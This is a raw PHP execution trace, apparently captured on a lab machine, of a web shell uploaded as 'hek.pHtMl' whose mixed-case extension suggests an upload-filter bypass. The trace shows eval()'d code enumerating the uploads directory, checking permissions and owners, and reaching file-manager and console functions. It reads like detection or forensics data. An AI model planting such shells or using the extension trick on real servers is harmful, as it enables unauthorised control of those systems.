/var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 340 1 '/var/www/html/uploads/hek.pHtMl' 6 152 1 0.016622 1318064 6 152 R TRUE 6 153 0 0.016635 1318024 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 342 1 '/var/www/html/uploads/hek.pHtMl' 6 153 1 0.016652 1318064 6 153 R FALSE 6 154 0 0.016665 1318024 fileperms 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 343 1 '/var/www/html/uploads/hek.pHtMl' 6 154 1 0.016680 1318064 6 154 R 33204 6 155 0 0.016693 1318024 perms 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 343 1 33204 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 322 $i = '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 328 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 329 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 330 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 331 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 332 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 333 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 334 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 335 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 336 $i .= '-' 6 155 1 0.016822 1318064 6 155 R '-rw-rw-r--' 5 151 1 0.016836 1318104 5 151 R '-rw-rw-r--' 5 156 0 0.016853 1318104 filesize 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 937 1 '/var/www/html/uploads/hek.pHtMl' 5 156 1 0.016868 1318144 5 156 R 35486 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 939 $tmp = ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes'] 5 157 0 0.016904 1317728 is_file 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 941 1 '/var/www/html/uploads/hek.pHtMl' 5 157 1 0.016919 1317768 5 157 R TRUE 5 158 0 0.016932 1317672 array_merge 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 942 2 ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes'] ['type' => 'file'] 5 158 1 0.016957 1318112 5 158 R ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 942 $files[] = ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 930 $i++ 5 159 0 0.017018 1318048 fileowner 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 'prepend.php' 5 159 1 0.017035 1318072 5 159 R 0 5 160 0 0.017047 1318032 posix_getpwuid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 1 0 5 160 1 0.017072 1318832 5 160 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 931 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 5 161 0 0.017115 1318048 filegroup 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 'prepend.php' 5 161 1 0.017129 1318088 5 161 R 0 5 162 0 0.017142 1318048 posix_getgrgid 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 1 0 5 162 1 0.017165 1318704 5 162 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 932 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 5 163 0 0.017203 1318584 filemtime 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 1 '/var/www/html/uploads/prepend.php' 5 163 1 0.017220 1318648 5 163 R 1676237247 5 164 0 0.017233 1318544 date 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 935 2 'Y-m-d H:i:s' 1676237247 5 164 1 0.017266 1318872 5 164 R '2023-02-12 16:27:27' 5 165 0 0.017281 1318864 viewPermsColor 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 936 1 '/var/www/html/uploads/prepend.php' 6 166 0 0.017296 1318864 is_readable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 340 1 '/var/www/html/uploads/prepend.php' 6 166 1 0.017314 1318904 6 166 R TRUE 6 167 0 0.017327 1318864 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 342 1 '/var/www/html/uploads/prepend.php' 6 167 1 0.017343 1318904 6 167 R FALSE 6 168 0 0.017357 1318864 fileperms 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 343 1 '/var/www/html/uploads/prepend.php' 6 168 1 0.017371 1318904 6 168 R 33261 6 169 0 0.017389 1318864 perms 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 343 1 33261 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 322 $i = '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 328 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 329 $i .= 'w' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 330 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 331 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 332 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 333 $i .= 'x' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 334 $i .= 'r' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 335 $i .= '-' 6 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 336 $i .= 'x' 6 169 1 0.017516 1318904 6 169 R '-rwxr-xr-x' 5 165 1 0.017530 1318944 5 165 R '-rwxr-xr-x' 5 170 0 0.017547 1318944 filesize 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 937 1 '/var/www/html/uploads/prepend.php' 5 170 1 0.017562 1318984 5 170 R 57 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 939 $tmp = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root'] 5 171 0 0.017599 1318568 is_file 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 941 1 '/var/www/html/uploads/prepend.php' 5 171 1 0.017615 1318608 5 171 R TRUE 5 172 0 0.017628 1318504 array_merge 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 942 2 ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root'] ['type' => 'file'] 5 172 1 0.017652 1318944 5 172 R ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 942 $files[] = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 930 $i++ 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 948 GLOBALS['sort'] = [0 => 'name', 1 => 1] 5 173 0 0.017732 1318904 usort 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 955 2 [0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']] 'cmp' 6 174 0 0.017770 1319352 cmp 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 955 2 ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'] 7 175 0 0.017805 1319352 strtolower 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 1 '.htaccess' 7 175 1 0.017828 1319384 7 175 R '.htaccess' 7 176 0 0.017851 1319352 strtolower 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 1 'hek.pHtMl' 7 176 1 0.017874 1319424 7 176 R 'hek.phtml' 7 177 0 0.017895 1319392 strcmp 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 2 '.htaccess' 'hek.phtml' 7 177 1 0.017918 1319456 7 177 R -1 6 174 1 0.017940 1319352 6 174 R -1 6 178 0 0.017960 1319352 cmp 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 955 2 ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'] ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] 7 179 0 0.018006 1319352 strtolower 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 1 'hek.pHtMl' 7 179 1 0.018028 1319424 7 179 R 'hek.phtml' 7 180 0 0.018050 1319392 strtolower 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 1 'prepend.php' 7 180 1 0.018071 1319424 7 180 R 'prepend.php' 7 181 0 0.018092 1319392 strcmp 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 2 'hek.phtml' 'prepend.php' 7 181 1 0.018114 1319456 7 181 R -1 6 178 1 0.018135 1319352 6 178 R -1 5 173 1 0.018155 1318976 5 173 R TRUE 5 182 0 0.018176 1318928 usort 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 956 2 [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']] 'cmp' 6 183 0 0.018219 1319376 cmp 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 956 2 ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] 7 184 0 0.018257 1319376 strtolower 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 1 '..' 7 184 1 0.018279 1319408 7 184 R '..' 7 185 0 0.018299 1319376 strtolower 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 1 'data' 7 185 1 0.018319 1319408 7 185 R 'data' 7 186 0 0.018339 1319376 strcmp 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 951 2 '..' 'data' 7 186 1 0.018361 1319440 7 186 R -3552051 6 183 1 0.018382 1319376 6 183 R -3552051 5 182 1 0.018403 1319000 5 182 R TRUE 5 187 0 0.018423 1318928 array_merge 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 957 2 [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']] [0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']] 5 187 1 0.018488 1319368 5 187 R [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 957 $files = [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 16:27:27', 'perms' => 'drwxrwxrwx', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-r--r--', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'hek.pHtMl', 'path' => '/var/www/html/uploads/hek.pHtMl', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rw-rw-r--', 'size' => 35486, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 16:27:27', 'perms' => '-rwxr-xr-x', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']] 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 958 $l = 0 5 188 0 0.018645 1319008 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 '..' 5 188 1 0.018668 1319072 5 188 R '..' 5 189 0 0.018692 1319136 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 '..' 5 189 1 0.018716 1319328 5 189 R '..' 5 190 0 0.018740 1319248 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 '..' 5 190 1 0.018762 1319312 5 190 R '..' 5 191 0 0.018782 1319376 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 '..' 5 191 1 0.018803 1319440 5 191 R '..' 5 192 0 0.018823 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 '..' 5 192 1 0.018844 1319632 5 192 R '..' 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 962 $l = 1 5 193 0 0.018895 1319024 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'data' 5 193 1 0.018917 1319088 5 193 R 'data' 5 194 0 0.018939 1319136 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'data' 5 194 1 0.018962 1319328 5 194 R 'data' 5 195 0 0.018984 1319248 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'data' 5 195 1 0.019005 1319312 5 195 R 'data' 5 196 0 0.019026 1319376 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'data' 5 196 1 0.019046 1319440 5 196 R 'data' 5 197 0 0.019067 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'data' 5 197 1 0.019086 1319632 5 197 R 'data' 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 962 $l = 0 5 198 0 0.019422 1319008 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 '.htaccess' 5 198 1 0.019440 1319080 5 198 R '.htaccess' 5 199 0 0.019456 1319056 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 '.htaccess' 5 199 1 0.019471 1319128 5 199 R '.htaccess' 5 200 0 0.019486 1319136 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 '.htaccess' 5 200 1 0.019502 1319328 5 200 R '.htaccess' 5 201 0 0.019519 1319120 viewSize 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 64 5 201 1 0.019537 1319152 5 201 R '64 B' 5 202 0 0.019552 1319248 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 '.htaccess' 5 202 1 0.019567 1319320 5 202 R '.htaccess' 5 203 0 0.019581 1319376 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 '.htaccess' 5 203 1 0.019595 1319448 5 203 R '.htaccess' 5 204 0 0.019609 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 '.htaccess' 5 204 1 0.019624 1319640 5 204 R '.htaccess' 5 205 0 0.019638 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 '.htaccess' 5 205 1 0.019652 1319640 5 205 R '.htaccess' 5 206 0 0.019666 1319792 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 '.htaccess' 5 206 1 0.019681 1319864 5 206 R '.htaccess' 5 207 0 0.019694 1319888 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 '.htaccess' 5 207 1 0.019708 1319960 5 207 R '.htaccess' 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 962 $l = 1 5 208 0 0.019736 1319024 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'hek.pHtMl' 5 208 1 0.019751 1319096 5 208 R 'hek.pHtMl' 5 209 0 0.019765 1319088 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'hek.pHtMl' 5 209 1 0.019779 1319160 5 209 R 'hek.pHtMl' 5 210 0 0.019793 1319168 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'hek.pHtMl' 5 210 1 0.019808 1319360 5 210 R 'hek.pHtMl' 5 211 0 0.019822 1319152 viewSize 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 35486 6 212 0 0.019838 1319152 sprintf 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 315 2 '%1.2f' 34.654296875 6 212 1 0.019857 1319536 6 212 R '34.65' 5 211 1 0.019871 1319192 5 211 R '34.65 KB' 5 213 0 0.019886 1319248 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'hek.pHtMl' 5 213 1 0.019900 1319320 5 213 R 'hek.pHtMl' 5 214 0 0.019914 1319440 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'hek.pHtMl' 5 214 1 0.019935 1319512 5 214 R 'hek.pHtMl' 5 215 0 0.019948 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'hek.pHtMl' 5 215 1 0.019962 1319640 5 215 R 'hek.pHtMl' 5 216 0 0.019976 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'hek.pHtMl' 5 216 1 0.019990 1319640 5 216 R 'hek.pHtMl' 5 217 0 0.020003 1319792 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'hek.pHtMl' 5 217 1 0.020017 1319864 5 217 R 'hek.pHtMl' 5 218 0 0.020030 1319888 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'hek.pHtMl' 5 218 1 0.020044 1319960 5 218 R 'hek.pHtMl' 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 962 $l = 0 5 219 0 0.020070 1319008 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'prepend.php' 5 219 1 0.020085 1319080 5 219 R 'prepend.php' 5 220 0 0.020099 1319056 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'prepend.php' 5 220 1 0.020113 1319128 5 220 R 'prepend.php' 5 221 0 0.020127 1319136 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'prepend.php' 5 221 1 0.020141 1319328 5 221 R 'prepend.php' 5 222 0 0.020156 1319152 viewSize 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 57 5 222 1 0.020171 1319184 5 222 R '57 B' 5 223 0 0.020185 1319248 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 960 1 'prepend.php' 5 223 1 0.020199 1319320 5 223 R 'prepend.php' 5 224 0 0.020212 1319376 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'prepend.php' 5 224 1 0.020226 1319448 5 224 R 'prepend.php' 5 225 0 0.020239 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'prepend.php' 5 225 1 0.020253 1319640 5 225 R 'prepend.php' 5 226 0 0.020267 1319568 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'prepend.php' 5 226 1 0.020281 1319640 5 226 R 'prepend.php' 5 227 0 0.020294 1319792 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'prepend.php' 5 227 1 0.020308 1319864 5 227 R 'prepend.php' 5 228 0 0.020321 1319952 urlencode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 961 1 'prepend.php' 5 228 1 0.020335 1320024 5 228 R 'prepend.php' 4 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 962 $l = 1 5 229 0 0.020362 1318928 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 967 1 '/var/www/html/uploads/' 5 229 1 0.020378 1319120 5 229 R '/var/www/html/uploads/' 5 230 0 0.020396 1318928 class_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 973 1 'ZipArchive' 5 230 1 0.020415 1318968 5 230 R FALSE 5 231 0 0.020430 1318928 hardFooter 1 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 980 0 6 232 0 0.020446 1318928 is_writable 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 256 1 '/var/www/html/uploads/' 6 232 1 0.020481 1318968 6 232 R TRUE 5 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 256 $is_writable = ' [ Writeable ]' 6 233 0 0.020512 1318928 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 261 1 'actionFilesMan' 6 233 1 0.020529 1318968 6 233 R TRUE 6 234 0 0.020543 1319184 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 261 1 '/var/www/html/uploads/' 6 234 1 0.020558 1319376 6 234 R '/var/www/html/uploads/' 6 235 0 0.020579 1319312 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 262 1 'actionFilesTools' 6 235 1 0.020596 1319352 6 235 R TRUE 6 236 0 0.020609 1319568 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 264 1 'actionFilesMan' 6 236 1 0.020624 1319608 6 236 R TRUE 6 237 0 0.020639 1319824 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 265 1 'actionFilesTools' 6 237 1 0.020655 1319864 6 237 R TRUE 6 238 0 0.020669 1320208 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 267 1 'actionConsole' 6 238 1 0.020685 1320248 6 238 R TRUE 6 239 0 0.020698 1320208 function_exists 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) 